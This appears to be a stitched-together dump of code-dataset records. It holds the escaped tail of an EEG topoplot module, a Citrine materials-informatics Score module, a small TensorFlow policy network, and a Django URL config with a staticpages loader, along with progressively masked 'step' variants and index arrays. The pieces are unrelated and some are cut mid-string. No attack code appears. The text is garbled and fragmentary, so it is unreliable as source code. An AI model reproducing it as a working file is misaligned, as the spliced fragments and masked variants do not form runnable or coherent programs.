ax.set_ylim(bottom, top)\r\n self.figure.canvas.draw()\r\n\r\n @property\r\n def yscale(self):\r\n \"\"\"Return yscale for subplots.\"\"\"\r\n yscales = [ax.get_yscale() for ax in self._subaxes]\r\n return yscales\r\n\r\n @yscale.setter\r\n def yscale(self, value='linear'):\r\n \"\"\"Set y-axis limits on all subplots.\"\"\"\r\n for ax in self._subaxes:\r\n ax.set_yscale(value)\r\n self.figure.canvas.draw()\r\n\r\n def auto_ylim(self, xlim=None, yscale='linear'):\r\n \"\"\"Return an estimate for a good ylim.\r\n\r\n Parameters\r\n ----------\r\n xlim : 2-tuple, optional\r\n Limits in (the index of) the data from where the scaling should be\r\n computed.\r\n yscale : linear or log, optional\r\n Scaling of y-axis.\r\n\r\n \"\"\"\r\n electrodes = [col for col in self.data.columns\r\n if col in ELECTRODES]\r\n if xlim is None:\r\n data = self.data.ix[:, electrodes]\r\n else:\r\n indices = ((self.data.index >= xlim[0]) &\r\n (self.data.index <= xlim[1]))\r\n data = self.data.ix[indices, electrodes]\r\n min_data = data.min().min()\r\n max_data = data.max().max()\r\n abs_max = max(abs(min_data), max_data)\r\n if yscale == 'linear' or yscale == 'symlog':\r\n if min_data >= 0:\r\n ylim = 0, max_data\r\n else:\r\n ylim = -abs_max, abs_max\r\n elif yscale == 
'log':\r\n if min_data > 0:\r\n ylim = min_data, max_data\r\n else:\r\n pseudo_zero = abs_max * 10 ** -5\r\n ylim = pseudo_zero, abs_max\r\n else:\r\n raise ValueError('Wrong value to yscale: {}'.format(yscale))\r\n return ylim\r\n\r\n def draw(self, type='plot', title=None, xlim=None, ylim=None,\r\n vmin=None, vmax=None,\r\n axis=False, yscale='linear'):\r\n \"\"\"Draw all components in multiplot including the data.\r\n\r\n Parameters\r\n ----------\r\n title : str, optional\r\n Title to put on the plot\r\n xlim : tuple of floats, optional\r\n X-axis limits used for each individual plots\r\n ylim : tuple of floats, optional\r\n Y-axis limits used for each individual plots\r\n\r\n \"\"\"\r\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\r\n self.draw_head()\r\n self.draw_inner_head()\r\n self.draw_nose()\r\n self.draw_data(type=type, xlim=xlim, ylim=ylim, vmin=vmin,\r\n vmax=vmax, axis=axis, yscale=yscale)\r\n if title is not None:\r\n self.axes.set_title(title)\r\n self.yscale = yscale\r\n\r\n\r\ndef topoplot(data=None, axes=None, method='linear', number_of_contours=10,\r\n title=None, xlim=None, ylim=None):\r\n \"\"\"Plot topographic map of the scalp in 2-D circular view.\r\n\r\n Draw the colored scalp map based on data in a Pandas Series where\r\n the values are indexed according to electrode name.\r\n\r\n Parameters\r\n ----------\r\n data : pandas.Series or pandas.DataFrame, optional\r\n Series with values and indexed by electrode names.\r\n methods : str, optional\r\n Interpolation method\r\n number_of_contours : int\r\n Number of contours in the colored plot.\r\n xlim : 2-tuple of floats, optional\r\n Limits of x-axis in multiplot\r\n ylim : 2-tuple of floats, optional\r\n Limits of y-axis in multiplot\r\n\r\n References\r\n ----------\r\n https://github.com/compmem/ptsa/blob/master/ptsa/plotting/topo.py\r\n\r\n http://sccn.ucsd.edu/~jung/tutorial/topoplot.htm\r\n\r\n Examples\r\n --------\r\n >>> import matplotlib.pyplot as plt\r\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\r\n >>> plt.ion()\r\n >>> topo_plot = topoplot(data)\r\n\r\n \"\"\"\r\n if isinstance(data, pd.Series) or isinstance(data, dict) or data is None:\r\n topo_plot = TopoPlot(data=data, axes=axes)\r\n topo_plot.draw(title=title, method=method,\r\n number_of_contours=number_of_contours)\r\n return topo_plot\r\n elif isinstance(data, pd.DataFrame):\r\n multi_plot = MultiPlot(data=data, axes=axes)\r\n multi_plot.draw(title=title, xlim=xlim, ylim=ylim)\r\n return multi_plot\r\n\r\n\r\ndef show():\r\n \"\"\"Show plot.\"\"\"\r\n plt.show()\r\n\r\n\r\ndef main(args):\r\n \"\"\"Handle command-line interface to topographic plot.\"\"\"\r\n xlim = args['--xlim']\r\n if args['--xlim'] is not None:\r\n xlim = [float(lim) for lim in xlim.split(',')]\r\n\r\n if args['<file>'] is None:\r\n topoplot()\r\n else:\r\n filename = args['<file>']\r\n if filename.lower().endswith('.csv'):\r\n from .core import read_csv\r\n\r\n df = read_csv(filename, index_col=0)\r\n if args['--transpose']:\r\n df = df.T\r\n if args['--sample-index'] is None:\r\n if args['--center'] is not None:\r\n df = df.center()\r\n topoplot(df, xlim=xlim)\r\n else:\r\n sample_index = int(args['--sample-index'])\r\n series = df.iloc[sample_index - 1, :]\r\n topoplot(series)\r\n else:\r\n exit('Only csv files handled')\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n from docopt import docopt\r\n\r\n main(docopt(__doc__))\r\n",
"step-ids": [
19,
22,
23,
25,
30
]
}
|
[
19,
22,
23,
25,
30
] |
"""Tools for working with Scores."""
from typing import List, Optional
from citrine._serialization import properties
from citrine._serialization.polymorphic_serializable import PolymorphicSerializable
from citrine._serialization.serializable import Serializable
from citrine._session import Session
from citrine.informatics.constraints import Constraint
from citrine.informatics.objectives import Objective
__all__ = ['Score', 'LIScore', 'EIScore', 'EVScore']
class Score(PolymorphicSerializable['Score']):
"""[ALPHA] A Citrine Score is used to rank materials according to objectives and constraints.
Abstract type that returns the proper type given a serialized dict.
"""
@classmethod
def get_type(cls, data):
"""Return the subtype."""
return {
'MLI': LIScore,
'MEI': EIScore,
'MEV': EVScore
}[data['type']]
class LIScore(Serializable['LIScore'], Score):
"""[ALPHA] Evaluates the likelihood of scoring better than some baselines for given objectives.
Parameters
----------
name: str
the name of the score
description: str
the description of the score
objectives: list[Objective]
objectives (e.g., maximize, minimize, tune, etc.)
baselines: list[float]
best-so-far values for the various objectives (there must be one for each objective)
constraints: list[Constraint]
constraints limiting the allowed values that material instances can have
"""
name = properties.String('name')
description = properties.String('description')
baselines = properties.List(properties.Float, 'baselines')
objectives = properties.List(properties.Object(Objective), 'objectives')
constraints = properties.List(properties.Object(Constraint), 'constraints')
typ = properties.String('type', default='MLI')
def __init__(self,
name: str,
description: str,
objectives: List[Objective],
baselines: List[float],
constraints: Optional[List[Constraint]] = None,
session: Optional[Session] = None):
self.name: str = name
self.description: str = description
self.objectives: List[Objective] = objectives
self.baselines: List[float] = baselines
self.constraints: List[Constraint] = constraints or []
self.session: Optional[Session] = session
def __str__(self):
return '<LIScore {!r}>'.format(self.name)
class EIScore(Serializable['EIScore'], Score):
"""
[ALPHA] Evaluates the expected magnitude of improvement beyond baselines for given objectives.
Parameters
----------
name: str
the name of the score
description: str
the description of the score
objectives: list[Objective]
objectives (e.g., maximize, minimize, tune, etc.)
baselines: list[float]
best-so-far values for the various objectives (there must be one for each objective)
constraints: list[Constraint]
constraints limiting the allowed values that material instances can have
"""
name = properties.String('name')
description = properties.String('description')
baselines = properties.List(properties.Float, 'baselines')
objectives = properties.List(properties.Object(Objective), 'objectives')
constraints = properties.List(properties.Object(Constraint), 'constraints')
typ = properties.String('type', default='MEI')
def __init__(self,
name: str,
description: str,
objectives: List[Objective],
baselines: List[float],
constraints: Optional[List[Constraint]] = None,
session: Optional[Session] = None):
self.name: str = name
self.description: str = description
self.objectives: List[Objective] = objectives
self.baselines: List[float] = baselines
self.constraints: List[Constraint] = constraints or []
self.session: Optional[Session] = session
def __str__(self):
return '<EIScore {!r}>'.format(self.name)
class EVScore(Serializable['EVScore'], Score):
"""
[ALPHA] Evaluates the expected value for given objectives.
Parameters
----------
name: str
the name of the score
description: str
the description of the score
objectives: list[Objective]
objectives (e.g., maximize, minimize, tune, etc.)
constraints: list[Constraint]
constraints limiting the allowed values that material instances can have
"""
name = properties.String('name')
description = properties.String('description')
objectives = properties.List(properties.Object(Objective), 'objectives')
constraints = properties.List(properties.Object(Constraint), 'constraints')
typ = properties.String('type', default='MEV')
def __init__(self,
name: str,
description: str,
objectives: List[Objective],
constraints: Optional[List[Constraint]] = None,
session: Optional[Session] = None):
self.name: str = name
self.description: str = description
self.objectives: List[Objective] = objectives
self.constraints: List[Constraint] = constraints or []
self.session: Optional[Session] = session
def __str__(self):
return '<EVScore {!r}>'.format(self.name)
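# --- Illustrative usage sketch (editor addition, not part of the original module) ---
# A score pairs objectives with one baseline value per objective, plus optional
# constraints. The objective below is a placeholder: any concrete Objective subclass
# from citrine.informatics.objectives would do (its exact name is an assumption here,
# not something this module guarantees).
#
# my_objective: Objective = ...      # e.g. an objective that maximizes some property
# score = LIScore(
#     name='Likelihood of improvement',
#     description='Chance of beating the best-so-far value',
#     objectives=[my_objective],
#     baselines=[42.0],              # one baseline per objective
# )
# assert Score.get_type({'type': 'MLI'}) is LIScore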
|
normal
|
{
"blob_id": "a0086a9d27a091776378cd8bde31c59899fc07ac",
"index": 3122,
"step-1": "<mask token>\n\n\nclass LIScore(Serializable['LIScore'], Score):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return '<LIScore {!r}>'.format(self.name)\n\n\nclass EIScore(Serializable['EIScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected magnitude of improvement beyond baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EIScore {!r}>'.format(self.name)\n\n\nclass EVScore(Serializable['EVScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected value for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEV')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], constraints: Optional[List[Constraint]]=None, session:\n Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EVScore {!r}>'.format(self.name)\n",
"step-2": "<mask token>\n\n\nclass LIScore(Serializable['LIScore'], Score):\n <mask token>\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MLI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<LIScore {!r}>'.format(self.name)\n\n\nclass EIScore(Serializable['EIScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected magnitude of improvement beyond baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EIScore {!r}>'.format(self.name)\n\n\nclass EVScore(Serializable['EVScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected value for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEV')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], constraints: Optional[List[Constraint]]=None, session:\n Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EVScore 
{!r}>'.format(self.name)\n",
"step-3": "<mask token>\n\n\nclass Score(PolymorphicSerializable['Score']):\n <mask token>\n <mask token>\n\n\nclass LIScore(Serializable['LIScore'], Score):\n \"\"\"[ALPHA] Evaluates the likelihood of scoring better than some baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MLI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<LIScore {!r}>'.format(self.name)\n\n\nclass EIScore(Serializable['EIScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected magnitude of improvement beyond baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EIScore {!r}>'.format(self.name)\n\n\nclass EVScore(Serializable['EVScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected value for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n objectives = 
properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEV')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], constraints: Optional[List[Constraint]]=None, session:\n Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EVScore {!r}>'.format(self.name)\n",
"step-4": "<mask token>\nfrom typing import List, Optional\nfrom citrine._serialization import properties\nfrom citrine._serialization.polymorphic_serializable import PolymorphicSerializable\nfrom citrine._serialization.serializable import Serializable\nfrom citrine._session import Session\nfrom citrine.informatics.constraints import Constraint\nfrom citrine.informatics.objectives import Objective\n__all__ = ['Score', 'LIScore', 'EIScore', 'EVScore']\n\n\nclass Score(PolymorphicSerializable['Score']):\n \"\"\"[ALPHA] A Citrine Score is used to rank materials according to objectives and constraints.\n\n Abstract type that returns the proper type given a serialized dict.\n\n\n \"\"\"\n\n @classmethod\n def get_type(cls, data):\n \"\"\"Return the subtype.\"\"\"\n return {'MLI': LIScore, 'MEI': EIScore, 'MEV': EVScore}[data['type']]\n\n\nclass LIScore(Serializable['LIScore'], Score):\n \"\"\"[ALPHA] Evaluates the likelihood of scoring better than some baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MLI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<LIScore {!r}>'.format(self.name)\n\n\nclass EIScore(Serializable['EIScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected magnitude of improvement beyond baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n 
self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EIScore {!r}>'.format(self.name)\n\n\nclass EVScore(Serializable['EVScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected value for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEV')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], constraints: Optional[List[Constraint]]=None, session:\n Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EVScore {!r}>'.format(self.name)\n",
"step-5": "\"\"\"Tools for working with Scores.\"\"\"\nfrom typing import List, Optional\n\nfrom citrine._serialization import properties\nfrom citrine._serialization.polymorphic_serializable import PolymorphicSerializable\nfrom citrine._serialization.serializable import Serializable\nfrom citrine._session import Session\nfrom citrine.informatics.constraints import Constraint\nfrom citrine.informatics.objectives import Objective\n\n__all__ = ['Score', 'LIScore', 'EIScore', 'EVScore']\n\n\nclass Score(PolymorphicSerializable['Score']):\n \"\"\"[ALPHA] A Citrine Score is used to rank materials according to objectives and constraints.\n\n Abstract type that returns the proper type given a serialized dict.\n\n\n \"\"\"\n\n @classmethod\n def get_type(cls, data):\n \"\"\"Return the subtype.\"\"\"\n return {\n 'MLI': LIScore,\n 'MEI': EIScore,\n 'MEV': EVScore\n }[data['type']]\n\n\nclass LIScore(Serializable['LIScore'], Score):\n \"\"\"[ALPHA] Evaluates the likelihood of scoring better than some baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MLI')\n\n def __init__(self,\n name: str,\n description: str,\n objectives: List[Objective],\n baselines: List[float],\n constraints: Optional[List[Constraint]] = None,\n session: Optional[Session] = None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<LIScore {!r}>'.format(self.name)\n\n\nclass EIScore(Serializable['EIScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected magnitude of improvement beyond baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEI')\n\n def __init__(self,\n name: str,\n description: str,\n objectives: List[Objective],\n baselines: List[float],\n constraints: Optional[List[Constraint]] = None,\n session: Optional[Session] = None):\n self.name: str = name\n self.description: str = description\n self.objectives: 
List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EIScore {!r}>'.format(self.name)\n\n\nclass EVScore(Serializable['EVScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected value for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n\n name = properties.String('name')\n description = properties.String('description')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEV')\n\n def __init__(self,\n name: str,\n description: str,\n objectives: List[Objective],\n constraints: Optional[List[Constraint]] = None,\n session: Optional[Session] = None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EVScore {!r}>'.format(self.name)\n",
"step-ids": [
12,
14,
16,
20,
21
]
}
|
[
12,
14,
16,
20,
21
] |
import tensorflow as tf
class PolicyFullyConnected:
    """Fully connected policy/value network over flattened 2-D observations (TF1 graph mode)."""
def __init__(self, observation_space, action_space, batch_size, reuse):
height = observation_space[0]
width = observation_space[1]
self.observations = tf.placeholder(shape=(batch_size, height, width), dtype=tf.float32)
with tf.variable_scope(name_or_scope="model", reuse=reuse):
reshaped_observations = tf.reshape(tensor=tf.to_float(self.observations),
shape=(batch_size, height * width))
self.hidden = tf.layers.dense(inputs=reshaped_observations,
units=256,
activation=tf.nn.relu)
logits = tf.layers.dense(inputs=self.hidden, units=action_space)
self.probs = tf.nn.softmax(logits)
self.values = tf.layers.dense(inputs=self.hidden, units=1)[:, 0]
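# --- Illustrative usage sketch (editor addition, not part of the original file) ---
# Builds the graph for an arbitrary 4x4 observation space with 4 discrete actions and
# evaluates action probabilities and value estimates for a random batch. The shapes
# and batch size are example values, not anything the class itself requires.
if __name__ == '__main__':
    import numpy as np
    policy = PolicyFullyConnected(observation_space=(4, 4), action_space=4,
                                  batch_size=8, reuse=False)
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        observations = np.random.rand(8, 4, 4).astype(np.float32)
        probs, values = sess.run([policy.probs, policy.values],
                                 feed_dict={policy.observations: observations})
        print(probs.shape, values.shape)  # (8, 4) (8,)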
|
normal
|
{
"blob_id": "ecf09f2c503452fefc427e8dbe151e7bc7ef677e",
"index": 6139,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass PolicyFullyConnected:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass PolicyFullyConnected:\n\n def __init__(self, observation_space, action_space, batch_size, reuse):\n height = observation_space[0]\n width = observation_space[1]\n self.observations = tf.placeholder(shape=(batch_size, height, width\n ), dtype=tf.float32)\n with tf.variable_scope(name_or_scope='model', reuse=reuse):\n reshaped_observations = tf.reshape(tensor=tf.to_float(self.\n observations), shape=(batch_size, height * width))\n self.hidden = tf.layers.dense(inputs=reshaped_observations,\n units=256, activation=tf.nn.relu)\n logits = tf.layers.dense(inputs=self.hidden, units=action_space)\n self.probs = tf.nn.softmax(logits)\n self.values = tf.layers.dense(inputs=self.hidden, units=1)[:, 0]\n",
"step-4": "import tensorflow as tf\n\n\nclass PolicyFullyConnected:\n\n def __init__(self, observation_space, action_space, batch_size, reuse):\n height = observation_space[0]\n width = observation_space[1]\n self.observations = tf.placeholder(shape=(batch_size, height, width\n ), dtype=tf.float32)\n with tf.variable_scope(name_or_scope='model', reuse=reuse):\n reshaped_observations = tf.reshape(tensor=tf.to_float(self.\n observations), shape=(batch_size, height * width))\n self.hidden = tf.layers.dense(inputs=reshaped_observations,\n units=256, activation=tf.nn.relu)\n logits = tf.layers.dense(inputs=self.hidden, units=action_space)\n self.probs = tf.nn.softmax(logits)\n self.values = tf.layers.dense(inputs=self.hidden, units=1)[:, 0]\n",
"step-5": "import tensorflow as tf\n\n\nclass PolicyFullyConnected:\n def __init__(self, observation_space, action_space, batch_size, reuse):\n height = observation_space[0]\n width = observation_space[1]\n self.observations = tf.placeholder(shape=(batch_size, height, width), dtype=tf.float32)\n\n with tf.variable_scope(name_or_scope=\"model\", reuse=reuse):\n reshaped_observations = tf.reshape(tensor=tf.to_float(self.observations),\n shape=(batch_size, height * width))\n\n self.hidden = tf.layers.dense(inputs=reshaped_observations,\n units=256,\n activation=tf.nn.relu)\n\n logits = tf.layers.dense(inputs=self.hidden, units=action_space)\n\n self.probs = tf.nn.softmax(logits)\n self.values = tf.layers.dense(inputs=self.hidden, units=1)[:, 0]",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
URL configuration to test mounting the URLs created from registries
"""
from django.contrib import admin
from django.urls import include, path
from staticpages.loader import StaticpagesLoader
staticpages_loader = StaticpagesLoader()
urlpatterns = [
path("admin/", admin.site.urls),
# Add base pages urls using the same template
*staticpages_loader.build_urls([
"index",
{
"template_path": "index.html",
"name": "foo",
"extra": "free for use",
},
])
]
# Include another urls map on a sub path
urlpatterns.append(
path("sub/", include("sandbox.staticpages_testapp.sub_urls")),
)
|
normal
|
{
"blob_id": "333914f99face050376e4713ca118f2347e50018",
"index": 989,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns.append(path('sub/', include(\n 'sandbox.staticpages_testapp.sub_urls')))\n",
"step-3": "<mask token>\nstaticpages_loader = StaticpagesLoader()\nurlpatterns = [path('admin/', admin.site.urls), *staticpages_loader.\n build_urls(['index', {'template_path': 'index.html', 'name': 'foo',\n 'extra': 'free for use'}])]\nurlpatterns.append(path('sub/', include(\n 'sandbox.staticpages_testapp.sub_urls')))\n",
"step-4": "<mask token>\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom staticpages.loader import StaticpagesLoader\nstaticpages_loader = StaticpagesLoader()\nurlpatterns = [path('admin/', admin.site.urls), *staticpages_loader.\n build_urls(['index', {'template_path': 'index.html', 'name': 'foo',\n 'extra': 'free for use'}])]\nurlpatterns.append(path('sub/', include(\n 'sandbox.staticpages_testapp.sub_urls')))\n",
